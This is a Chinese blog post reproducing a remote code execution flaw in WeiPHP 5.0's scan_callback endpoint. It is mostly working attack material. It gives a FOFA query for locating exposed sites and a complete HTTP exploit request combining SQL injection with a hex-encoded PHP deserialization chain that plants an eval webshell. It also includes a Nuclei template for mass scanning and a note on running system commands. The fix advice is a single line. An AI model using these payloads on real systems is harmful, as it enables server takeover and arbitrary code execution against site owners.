热门标签
热门文章
- 1揭秘大模型AI Agent:人工智能的新纪元_大模型与ai agent
- 2Apollo9.0环境配置
- 3升级OpenSSH版本(安装telnet远程管理主机)_ubuntu升级openssh
- 4gradle 代理配置_setting.gradel配置端口号
- 5连接编码器_三菱PLC与旋转编码器的接线图
- 6一个岔路口分别通向诚实国和说谎国。 来了两个人,已知一个是诚实国的,另一个是说谎国的。 诚实国永远说实话,说谎国永远说谎话。现在你要去说谎国, 但不知道应该走哪条路,需要问这两个人。请问应该怎么问?(_一个岔路口分别通向诚实国和说谎国。来了两个人,已知一个是诚实国的,另一个是说谎
- 7docker安装jenkins并且通过jenkins部署项目(超详细and靠谱)_docker jenkins部署
- 8CVPR 2024 超分辨率(super-resolution)方向上接收论文总结_2024超分辨率
- 9解决cv2. imread、imwrite无法读取或保存中文路径图片问题_cv2.imwrite 中文路径
- 10文件后缀大全_bpccnv
当前位置: article > 正文
漏洞复现-weiphp5.0 scan_callback代码执行漏洞
作者:小桥流水78 | 2024-07-23 17:52:53
赞
踩
漏洞复现-weiphp5.0 scan_callback代码执行漏洞
漏洞描述
weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。
影响版本
WeiPHP5.0
漏洞复现
FOFA:(body="content=\"WeiPHP" || body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0")
漏洞数据包:
- POST /public/index.php/weixin/Notice/index?img=echo+md5(123);exit(); HTTP/1.1
- Host: 127.0.0.1
- User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
- Connection: close
- Content-Length: 1340
- Content-Type: application/x-www-form-urlencoded
- Accept-Encoding: gzip
-
- <xml>
- <product_id>aaaa</product_id>
- <appid>exp</appid>
- <appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>
- <mch_id>aaa</mch_id>
- <nonce_str>aaa</nonce_str>
- <openid>aaa</openid>
- </xml>
执行MD5加密值
使用MD5进行解密
批量检测
- id: weiphp-cms-scan_callback-rce
-
- info:
- name: weiphp-cms-scan_callback-rce
- author: unknow
- severity: critical
- description: weiphp5.0 scan_callback 存在代码执行漏洞。
- tags: weiphp,rce
- metadata:
- fofa-query: (body="content=\"WeiPHP" || body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0")
- http:
- - raw:
- - |
- POST /public/index.php/weixin/Notice/index?img={{rce}}exit(); HTTP/1.1
- Host:
- Content-Type: application/x-www-form-urlencoded
- <xml>
- <product_id>aaaa</product_id>
- <appid>exp</appid>
- <appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>
- <mch_id>aaa</mch_id>
- <nonce_str>aaa</nonce_str>
- <openid>aaa</openid>
- </xml>
- payloads:
- rce:
- - "echo+md5(123);"
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - 'status_code_1==500 && contains(body_1, "202cb962ac59075b964b07152d234b70") && contains(header_1, "text/html")'
- #执行:echo+md5(123);system('whoami');
修复建议
请关注官网更新 :https://www.weiphp.cn/
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小桥流水78/article/detail/870924
推荐阅读
相关标签
